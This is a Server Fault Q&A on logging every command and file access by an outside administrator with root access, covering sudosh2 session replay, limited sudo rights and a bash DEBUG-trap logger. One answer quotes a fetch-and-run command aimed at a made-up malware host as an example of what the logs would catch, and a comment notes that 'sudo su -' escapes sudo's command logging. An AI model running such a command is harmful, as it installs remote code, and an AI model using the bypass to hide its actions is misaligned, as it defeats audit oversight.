# Log every command executed from root

Tags: security, freebsd

I want to give access to my root server to an external system administrator, but i want to be sure to double check what he is doing to my server, e.g. copying data i don't want them to do and so on. I would also like to take a track of whatever file is accessed, even in read only and not edited.

How can i do that?

Comment: See this related question: http://serverfault.com/questions/181131/how-to-grant-temporary-access-to-server ?

Answer (score 21, accepted):

**Trust, but verify!**

Check out [sudosh2](http://sourceforge.net/projects/sudosh2/). sudosh2 is provided by FreeBSD ports. Packages are available for RedHat and Ubuntu. Here is the description from their website:

> sudosh is an auditing shell filter and can be used as a login shell.
>   Sudosh records all keystrokes and output and can play back the session
>   as just like a VCR.

Sudosh will allow you to replay the user's session, which will allow you to see all input *and* output as the user saw it. You see everything, keystrokes, typos, backspaces, what did they edit in `vi`, the output of `wget -O- http://zyxzyxzyxzyx.ru/haxor/malware | /bin/sh`, etc.

It's possible to send sudosh logs to syslog, so that they can be stored on a central syslog server away from the system.

Note that sudosh2 is a replacement for sudosh, which was abandoned by it's author

Do you work at an academic institution where users insist on having superuser privledges? Or do you work at a corporation and want to allow users to have superuser privileges on their own VMs? This might be the solution for you.

Comment: Excellent - I previously hadn't heard of sudosh.

Comment: What's this 'VCR' you speak of?

Comment: It's like an 8-track, but you get to record your own television shows!

Answer (score 22):

Don't give him root access. Instead, give him an un-privileged user account and request that he do all of his work through `sudo`, which will log all of his commands.

Keep in mind that if this person has ill intentions and you give him full sudo privileges, he *will* find a way to carry out those ill intentions without those commands being logged. In this case, only grant him access to the specific commands he needs to do his job.

Comment: i want to make it as hard as possible without making my life a pain. Thanks for the answer.

Comment: You can just run `sudo su -` and have a root shell that won't be logged (except that you started it). This is what I normally type when I want to do more than a single command as root in one go, or if I want tab completion in directories normal users can't read.

Comment: @rjmunro - Which is exactly why I issued the caveat of only giving him the specific access he needs. You can explicitly forbid `sudo su -` if desired.

Answer (score 1):

I'm not familiar with sudosh2, but I put the following in my `.bashrc` to log all the commands I type in a `bash` shell to the file `~/.command_log`:

```sh
# log every command typed and when
if [ -n "${BASH_VERSION}" ]; then
    trap "caller >/dev/null || \
printf '%s\\n' \"\$(date '+%Y-%m-%dT%H:%M:%S%z')\
 \$(tty) \${BASH_COMMAND}\" 2>/dev/null >>~/.command_log" DEBUG
fi
```

The above sets a trap on `DEBUG`, which is executed just before an ordinary command is executed.  The `caller` built-in is used to test whether the command is being typed at an interactive shell or run via something like `.bashrc`.  The value `${BASH_COMMAND}` contains the command currently being executed.